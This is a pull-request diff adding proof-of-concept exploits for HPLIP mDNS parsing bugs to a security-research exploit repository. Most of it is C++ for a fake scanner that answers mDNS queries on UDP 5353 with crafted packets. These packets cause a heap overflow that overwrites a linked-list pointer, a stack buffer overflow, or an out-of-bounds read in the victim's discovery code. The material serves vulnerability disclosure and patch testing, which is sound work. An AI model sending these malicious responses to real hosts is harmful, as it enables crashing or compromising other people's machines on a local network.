Merge pull request #189 from kevinbackhouse/HPLIP

Add HPLIP poc (GHSL-2020-074, GHSL-2020-077, GHSL-2020-078)

Author: xcorail

SecurityExploits/SANE/epsonds_CVE-2020-12861/README.md

@@ -1,4 +1,4 @@
-# Vulnerabilities in SANE Backends
+# Vulnerabilities in SANE Backends and HPLIP
 
 This directory contains two proof-of-concept exploits for several vulnerabilities in
 [SANE Backends](https://gitlab.com/sane-project/backends).

SecurityExploits/SANE/epsonds_CVE-2020-12861/fakescanner.cpp

@@ -241,6 +241,298 @@ class BuildMagicolorHandlerTCP : public BuildRecvHandlerTCP {
   }
 };
 
+// The exact bytes of the buffer sent by this call (mdns.c:442):
+//
+//   mdns_send_query(udp_socket, "_scanner._tcp.local", QTYPE_PTR);
+//
+static const char scanner_tcp_local[37] = {
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x08, 0x5f, 0x73, 0x63, 0x61, 0x6e, 0x6e, 0x65, 0x72, 0x04, 0x5f, 0x74,
+  0x63, 0x70, 0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00,
+  0x01
+};
+
+// The exact bytes of the buffer sent by this call (mdns.c:443):
+//
+//   mdns_send_query(udp_socket, "_uscan._tcp.local", QTYPE_PTR);
+//
+static const char uscan_tcp_local[35] = {
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x06, 0x5f, 0x75, 0x73, 0x63, 0x61, 0x6e, 0x04, 0x5f, 0x74, 0x63, 0x70,
+  0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00, 0x01
+};
+
+class HplipHandler : public RecvHandlerUDP {
+  char malicious_response_buf[2048];
+
+  // Trigger a buffer overflow in mdns_readName (mdns.c:191).  The
+  // destination buffer is `rr->name`, which is a 256 byte buffer. We will
+  // write off the end of it, overwriting the `rr->next` pointer.  The
+  // bogus pointer triggers a crash at mdns.c:393.
+  static size_t init_buf_heap_overflow(char* buf) {
+    size_t pos = 0;
+    // id
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // flags
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // questions
+    buf[pos++] = 0;
+    buf[pos++] = 1;
+    // answers
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // authorities
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // additionals
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+
+    // mdns_readName (mdns.c:279)
+    buf[pos++] = 0xBF;
+    memset(buf + pos, 'x', 0xBF);
+    pos += 0xBF;
+    buf[pos++] = 0x50;
+    memset(buf + pos, 'x', 0x40);
+    pos += 0x40;
+    ((uint64_t*)(buf + pos))[0] = 0xFEDCBA9876543210;     // pointer to next DNS_RECORD
+    ((uint64_t*)(buf + pos))[1] = 604;  // mchunk_size (malloc.c)
+    pos += 0x10;
+    buf[pos++] = 0; // End the name
+
+    printf("setzero size=%ld\n", pos);
+    return pos;
+  }
+
+  // Trigger a stack buffer overflow in mdns_update_uris (mdns.c:396).
+  static size_t init_buf_stack_smash(char* buf) {
+    size_t pos = 0;
+    // id
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // flags
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // questions
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // answers
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // authorities
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // additionals
+    buf[pos++] = 0;
+    buf[pos++] = 2;
+
+    // mdns_readName (mdns.c:279)
+    buf[pos++] = 9;
+    memcpy(&buf[pos], "kevwozere", 10);
+    pos += 10;
+
+    // type = QTYPE_TXT (16). (mdns.c:280)
+    buf[pos++] = 0;
+    buf[pos++] = 16;
+    pos += 6;
+
+    // data_len = 256. (mdns.c:283)
+    buf[pos++] = 1;
+    buf[pos++] = 0;
+
+    // mdns_readMDL (mdns.c:204)
+    const uint8_t modelLen = 0xFF;
+    buf[pos++] = modelLen;
+    memcpy(buf + pos, "mdl=", 4);
+    pos += 4;
+    memset(buf + pos, 'x', modelLen - 4);
+    pos += modelLen - 4;
+
+    // mdns_readName (mdns.c:279)
+    buf[pos++] = 9;
+    memcpy(&buf[pos], "kevwozere", 10);
+    pos += 10;
+
+    // type = QTYPE_A (1). (mdns.c:280)
+    buf[pos++] = 0;
+    buf[pos++] = 1;
+    pos += 6;
+
+    // data_len = 4. (mdns.c:283)
+    buf[pos++] = 0;
+    buf[pos++] = 4;
+
+    // Bogus ip address
+    memset(buf + pos, 0xFF, 4);
+    pos += 4;
+
+    printf("first response size=%ld\n", pos);
+    return pos;
+  }
+
+  // Trigger an out of bounds read at mdns.c:279.
+  static size_t init_buf_out_of_bounds_read(char* buf) {
+    size_t pos = 0;
+    // id
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // flags
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // questions
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // answers
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // authorities
+    buf[pos++] = 0;
+    buf[pos++] = 0;
+    // additionals
+    buf[pos++] = 0;
+    buf[pos++] = 2;
+
+    // mdns_readName (mdns.c:279)
+    buf[pos++] = 9;
+    memcpy(&buf[pos], "kevwozere", 10);
+    pos += 10;
+
+    // type = QTYPE_TXT (16). (mdns.c:280)
+    buf[pos++] = 0;
+    buf[pos++] = 16;
+    pos += 6;
+
+    // data_len = 0xFFFF. (mdns.c:283)
+    // This causes the pointer `p` to be advanced far beyond the bounds of
+    // the buffer, leading to an out of bounds read. This bug does not cause
+    // a crash, but it could possibly be used for information disclosure.
+    buf[pos++] = 0xFF;
+    buf[pos++] = 0xFF;
+
+    // mdns_readMDL (mdns.c:204)
+    const uint8_t modelLen = 0xFF;
+    buf[pos++] = modelLen;
+    memcpy(buf + pos, "mdl=", 4);
+    pos += 4;
+    memset(buf + pos, 'x', modelLen - 4);
+    pos += modelLen - 4;
+    return pos;
+  }
+
+  static bool parse_packet(const uint8_t* buf, ssize_t size) {
+    static const char header[] =
+      { 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+
+    if (size <= (ssize_t)sizeof(header)) {
+      return false;
+    }
+
+    if (memcmp(buf, header, sizeof(header))) {
+      printf("unrecognized header:");
+      size_t i;
+      for (i = 0; i < sizeof(header); i++) {
+        printf(" %.2x", buf[i]);
+      }
+      printf("\n");
+    }
+
+    ssize_t pos = sizeof(header);
+    while (1) {
+      assert(pos < size);
+      uint8_t segsize = buf[pos];
+      if (segsize == 0) {
+        pos++;
+        break;
+      }
+      pos++;
+      assert(pos <= size);
+      if (segsize >= size - pos) {
+        printf("bad segment size: %d %ld\n", segsize, size-pos);
+        return false;
+      }
+      size_t i;
+      printf(".");
+      for (i = 0; i < segsize; i++) {
+        printf("%c", buf[pos + i]);
+      }
+      pos += segsize;
+    }
+
+    printf("\n");
+
+    // The next 4 bytes are: 0, query_type, 0, QCLASS_IN
+    assert(pos <= size);
+    if (size - pos < 4) {
+      printf("message too short\n");
+      return false;
+    }
+    if (buf[pos] != 0 || buf[pos+2] != 0 || buf[pos+3] != 1) {
+      printf("buf[pos..pos+3] = %.02x %.02x %.02x %.02x\n",
+             buf[pos], buf[pos+1], buf[pos+2], buf[pos+3]);
+    }
+    uint8_t query_type = buf[pos+1];
+    printf("query_type = %x\n", query_type);
+    pos += 4;
+    printf("remaining bytes: %ld\n", size-pos);
+
+    ssize_t i;
+    for (i = pos; i < size; i++) {
+      printf("%.2x", buf[i]);
+    }
+    printf("\n");
+
+    return (size == pos);
+  }
+
+public:
+  HplipHandler(int mode) {
+    memset(malicious_response_buf, 0, sizeof(malicious_response_buf));
+    switch (mode) {
+    case 0:
+      init_buf_heap_overflow(malicious_response_buf);
+      break;
+    case 1:
+      init_buf_stack_smash(malicious_response_buf);
+      break;
+    case 2:
+      init_buf_out_of_bounds_read(malicious_response_buf);
+      break;
+    default:
+      printf("Invalid hplip mode: %d\n", mode);
+      break;
+    }
+  }
+
+  virtual ~HplipHandler() {}
+
+  virtual int receive(
+    const uint8_t* buf, ssize_t len,
+    SocketHandlerUDP& sock,
+    const sockaddr* peer_addr, socklen_t peer_addr_len
+  ) override {
+    print_addr(peer_addr, peer_addr_len);
+    parse_packet(buf, len);
+
+    if (len != sizeof(scanner_tcp_local)) {
+      // We're not interested in this message.
+      return 0;
+    }
+    if (memcmp(buf, scanner_tcp_local, sizeof(scanner_tcp_local)) != 0) {
+      // We're not interested in this message.
+      return 0;
+    }
+
+    printf("send malicious\n");
+    sock.replyto(
+      malicious_response_buf, sizeof(malicious_response_buf),
+      peer_addr, peer_addr_len
+    );
+    return 0;
+  }
+};
+
 static const char epsonp_discover[15] = "EPSONP\x00\xff\x00\x00\x00\x00\x00\x00";
 
 static const char epsonp_response[76] =
@@ -811,7 +1103,7 @@ int main(int argc, char* argv[]) {
     fprintf(
       stderr,
       "usage: %s <command>\n"
-      "commands: epson [0-8], magicolor\n",
+      "commands: hplip [0-2], epson [0-8], magicolor\n",
       prog
     );
     exit(EXIT_FAILURE);
@@ -840,6 +1132,24 @@ int main(int argc, char* argv[]) {
       fprintf(stderr, "Failed to bind UDP port 4567.\n");
       exit(EXIT_FAILURE);
     }
+  } else if (strcmp(command, "hplip") == 0) {
+    if (argc != 3) {
+      fprintf(
+        stderr,
+        "usage: %s hplip [0-2]\n"
+        "You need to include a mode number.\n",
+        argv[0]
+      );
+      exit(EXIT_FAILURE);
+    }
+    const int mode = atoi(argv[2]);
+    if (EpollRecvHandlerUDP::build(
+          epollfd,
+          create_and_bind_udp(5353),
+          new HplipHandler(mode)) < 0) {
+      fprintf(stderr, "Failed to bind UDP port 5353.\n");
+      exit(EXIT_FAILURE);
+    }
   } else if (strcmp(command, "epson") == 0) {
     if (argc != 3) {
       fprintf(